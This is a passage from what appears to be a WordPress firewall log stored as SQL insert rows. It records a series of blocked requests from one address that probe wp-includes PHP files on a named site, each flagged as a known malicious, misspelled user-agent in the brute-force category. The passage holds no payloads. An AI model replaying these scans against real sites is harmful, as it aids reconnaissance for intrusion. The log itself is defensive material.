User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Fzc2V0cy9zY3JpcHQtbG9hZGVyLXJlYWN0LXJlZnJlc2gtcnVudGltZS5taW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133857,1699931388.813984,1699931388.791800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/certificates/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NlcnRpZmljYXRlcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133858,1699931373.344348,1699931373.322400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/blocks/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133889,1699931659.071874,1699931659.063000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-filter-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtZmlsdGVyLXNldHRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133859,1699931358.923291,1699931358.908700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133860,1699931354.194685,1699931354.185400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template-utils.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLXV0aWxzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133861,1699931348.633094,1699931348.606900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/utils.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3V0aWxzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133888,1699931662.824672,1699931662.816000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaGVhZGVyLWltYWdlLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133862,1699931344.376785,1699931344.339900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/typography.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3R5cG9ncmFwaHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133863,1699931331.862570,1699931331.853200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/spacing.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NwYWNpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133864,1699931323.131059,1699931323.121800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/shadow.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NoYWRvdy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133964,1699932180.602762,1699932180.581100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-response.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3QtcmVzcG9uc2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133887,1699931677.402564,1699931677.380900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-setting.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaGVhZGVyLWltYWdlLXNldHRpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133865,1699931317.952552,1699931317.937200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/settings.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3NldHRpbmdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133866,1699931311.177691,1699931311.168900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/position.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL3Bvc2l0aW9uLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133867,1699931303.750093,1699931303.728000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/layout.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2xheW91dC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133886,1699931692.822236,1699931692.799900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-image-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaW1hZ2UtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133868,1699931292.273286,1699931292.264500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/generated-classname.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2dlbmVyYXRlZC1jbGFzc25hbWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133869,1699931287.200818,1699931287.192100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/elements.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2VsZW1lbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133870,1699931281.665329,1699931281.656600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/duotone.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2R1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134024,1699932617.907642,1699932617.892300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/lib/ristretto255.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvbGliL3Jpc3RyZXR0bzI1NS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133885,1699931696.948428,1699931696.939600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-media-control.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtbWVkaWEtY29udHJvbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133871,1699931274.851878,1699931274.842800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/dimensions.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2RpbWVuc2lvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133965,1699932157.601693,1699932157.592900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/rest-api/class-wp-rest-request.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3Jlc3QtYXBpL2NsYXNzLXdwLXJlc3QtcmVxdWVzdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133872,1699931268.349226,1699931268.340400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/custom-classname.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2N1c3RvbS1jbGFzc25hbWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133884,1699931453.290607,1699931453.281700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133873,1699931261.587127,1699931261.572300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/colors.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 